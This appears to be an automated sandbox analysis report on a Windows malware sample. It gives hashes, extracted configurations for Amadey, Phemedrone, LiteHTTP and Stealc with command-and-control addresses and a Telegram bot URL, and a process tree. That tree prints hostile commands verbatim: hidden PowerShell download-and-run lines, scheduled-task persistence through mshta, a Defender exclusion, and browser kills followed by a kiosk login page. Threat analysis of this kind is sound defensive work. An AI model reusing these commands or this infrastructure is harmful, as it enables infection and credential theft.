Analysis

  • max time kernel
    146s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241023-en, locale:en-us, os:windows7-x64, system
  • submitted
    05/03/2025, 17:14

General

  • Target

    c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe

  • Size

    938KB

  • MD5

    49b60f16af6a6028755c86cad74bb4ee

  • SHA1

    a94d538bebbbcf138c9116f5201009ae14d9c773

  • SHA256

    c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67

  • SHA512

    dd120b906b034e837c1ede550f5b6d9afdb045ba50aef3cff87473cccd96b51827b2477e3fcb1b8658c5926adb2deaa0f26706dc30f97a6b9fb841f46ff2d314

  • SSDEEP

    24576:VqDEvCTbMWu7rQYlBQcBiT6rprG8a0su:VTvC/MTQYxsWR7a0s

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

phemedrone

C2

https://api.telegram.org/bot8073216408:AAGdXWcCmxBIngZx-Z502Gat9NRWpLvPTxU/sendDocument

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer, an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer, an antivirus disabler dropper.

  • Healer family
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Phemedrone

    An information and wallet stealer written in C#.

  • Phemedrone family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Uses the powershell.exe command.

  • Downloads MZ/PE file 18 IoCs
  • .NET Reactor protector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 28 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steals credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 48 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 21 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe
    "C:\Users\Admin\AppData\Local\Temp\c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2344
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn sAVWimaZmA8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\5O6m4Aci3.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2348
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn sAVWimaZmA8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\5O6m4Aci3.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:796
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\5O6m4Aci3.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2384
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'N0YLF0SZTWBIWIIVCTXBO8R82X2LF9HZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2096
        • C:\Users\Admin\AppData\Local\TempN0YLF0SZTWBIWIIVCTXBO8R82X2LF9HZ.EXE
          "C:\Users\Admin\AppData\Local\TempN0YLF0SZTWBIWIIVCTXBO8R82X2LF9HZ.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2668
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2148
            • C:\Users\Admin\AppData\Local\Temp\10104610101\25a04a2d7b.exe
              "C:\Users\Admin\AppData\Local\Temp\10104610101\25a04a2d7b.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2976
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn kvv9mman2mc /tr "mshta C:\Users\Admin\AppData\Local\Temp\eBj8pOrnF.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2760
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn kvv9mman2mc /tr "mshta C:\Users\Admin\AppData\Local\Temp\eBj8pOrnF.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2616
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\eBj8pOrnF.hta
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:2036
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LSYPCZ2N86F9OP1FNDNCAIWRH73F60AZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2536
                  • C:\Users\Admin\AppData\Local\TempLSYPCZ2N86F9OP1FNDNCAIWRH73F60AZ.EXE
                    "C:\Users\Admin\AppData\Local\TempLSYPCZ2N86F9OP1FNDNCAIWRH73F60AZ.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1880
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\10104620121\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1788
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:1908
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2380
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1972
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2292
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1912
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1496
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1532
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "hAJ9Vma2nNM" /tr "mshta \"C:\Temp\BvIzlcQOD.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:796
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\BvIzlcQOD.hta"
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                PID:2076
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:876
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2836
            • C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe
              "C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:3020
              • C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe
                "C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2824
                • C:\Users\Admin\AppData\Roaming\qZLzlyV9Ne.exe
                  "C:\Users\Admin\AppData\Roaming\qZLzlyV9Ne.exe"
                  8⤵
                  • Executes dropped EXE
                  PID:1392
                • C:\Users\Admin\AppData\Roaming\udorB5ZSMp.exe
                  "C:\Users\Admin\AppData\Roaming\udorB5ZSMp.exe"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1960
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 1960 -s 1572
                    9⤵
                      PID:2584
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 504
                  7⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:2704
              • C:\Users\Admin\AppData\Local\Temp\10104850101\fd91aeb028.exe
                "C:\Users\Admin\AppData\Local\Temp\10104850101\fd91aeb028.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:680
                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                  7⤵
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:644
              • C:\Users\Admin\AppData\Local\Temp\10104860101\141c83b051.exe
                "C:\Users\Admin\AppData\Local\Temp\10104860101\141c83b051.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:2764
                • C:\Users\Admin\AppData\Local\Temp\10104860101\141c83b051.exe
                  "C:\Users\Admin\AppData\Local\Temp\10104860101\141c83b051.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2888
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 1016
                    8⤵
                    • Loads dropped DLL
                    • Program crash
                    PID:2672
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 508
                  7⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:2896
              • C:\Users\Admin\AppData\Local\Temp\10104870101\e81eff42e0.exe
                "C:\Users\Admin\AppData\Local\Temp\10104870101\e81eff42e0.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2168
                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                  7⤵
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:1612
              • C:\Users\Admin\AppData\Local\Temp\10104880101\fc259c3d14.exe
                "C:\Users\Admin\AppData\Local\Temp\10104880101\fc259c3d14.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                PID:988
              • C:\Users\Admin\AppData\Local\Temp\10104890101\23401e2b1c.exe
                "C:\Users\Admin\AppData\Local\Temp\10104890101\23401e2b1c.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                PID:2396
              • C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
                "C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"
                6⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2804
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\XEUO4NQk\Anubis.exe""
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2568
              • C:\Users\Admin\AppData\Local\Temp\10104920101\7c161f386c.exe
                "C:\Users\Admin\AppData\Local\Temp\10104920101\7c161f386c.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1144
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 1200
                  7⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:1428
              • C:\Users\Admin\AppData\Local\Temp\10104930101\590fcbc813.exe
                "C:\Users\Admin\AppData\Local\Temp\10104930101\590fcbc813.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2360
              • C:\Users\Admin\AppData\Local\Temp\10104940101\63af54f7b0.exe
                "C:\Users\Admin\AppData\Local\Temp\10104940101\63af54f7b0.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:3044
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM firefox.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2752
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM chrome.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:980
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM msedge.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2660
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM opera.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2108
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM brave.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:916
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                  7⤵
                    PID:1476
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                      8⤵
                      • Checks processor information in registry
                      • Modifies registry class
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:1400
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1400.0.774406854\1729853529" -parentBuildID 20221007134813 -prefsHandle 1240 -prefMapHandle 1232 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7fc0e4fa-dcaf-406f-83e2-ddee0a41c579} 1400 "\\.\pipe\gecko-crash-server-pipe.1400" 1304 46dc258 gpu
                        9⤵
                          PID:2272
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1400.1.1064916960\1395006354" -parentBuildID 20221007134813 -prefsHandle 1512 -prefMapHandle 1508 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {da23025b-9961-410e-bba8-1d1735635109} 1400 "\\.\pipe\gecko-crash-server-pipe.1400" 1524 e74858 socket
                          9⤵
                            PID:1296
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1400.2.992739134\1381159945" -childID 1 -isForBrowser -prefsHandle 2056 -prefMapHandle 2052 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0cb9543-4c93-4e87-b7db-dd98f54a8a4d} 1400 "\\.\pipe\gecko-crash-server-pipe.1400" 2068 1a3a5058 tab
                            9⤵
                              PID:628
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1400.3.2069943271\1619798141" -childID 2 -isForBrowser -prefsHandle 2904 -prefMapHandle 2900 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0ac47d9-abfd-44a1-a201-374235ae52d5} 1400 "\\.\pipe\gecko-crash-server-pipe.1400" 2916 1b0f9958 tab
                              9⤵
                                PID:2348
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1400.4.2133646382\731071909" -childID 3 -isForBrowser -prefsHandle 3648 -prefMapHandle 2684 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bda12876-a2b7-45d3-8bb2-443796616aa2} 1400 "\\.\pipe\gecko-crash-server-pipe.1400" 3676 1f570658 tab
                                9⤵
                                  PID:2504
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1400.5.126285588\838086408" -childID 4 -isForBrowser -prefsHandle 3800 -prefMapHandle 3804 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf03fd81-89c5-4c5a-b980-83eda306b942} 1400 "\\.\pipe\gecko-crash-server-pipe.1400" 3788 1f571b58 tab
                                  9⤵
                                    PID:2600
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1400.6.2094796341\147379502" -childID 5 -isForBrowser -prefsHandle 3964 -prefMapHandle 3968 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8589d181-157b-4616-bbd5-2e68db8d1b92} 1400 "\\.\pipe\gecko-crash-server-pipe.1400" 3952 1f949558 tab
                                    9⤵
                                      PID:108
                              • C:\Users\Admin\AppData\Local\Temp\10104950101\90076af2a4.exe
                                "C:\Users\Admin\AppData\Local\Temp\10104950101\90076af2a4.exe"
                                6⤵
                                • Modifies Windows Defender DisableAntiSpyware settings
                                • Modifies Windows Defender Real-time Protection settings
                                • Modifies Windows Defender TamperProtection settings
                                • Modifies Windows Defender notification settings
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Windows security modification
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2284
                              • C:\Users\Admin\AppData\Local\Temp\10104960101\joblam.exe
                                "C:\Users\Admin\AppData\Local\Temp\10104960101\joblam.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:3372
                              • C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe
                                "C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe"
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:3452
                                • C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  PID:3512
                                • C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:3520
                                  • C:\Users\Admin\AppData\Roaming\zTtfgzgam0.exe
                                    "C:\Users\Admin\AppData\Roaming\zTtfgzgam0.exe"
                                    8⤵
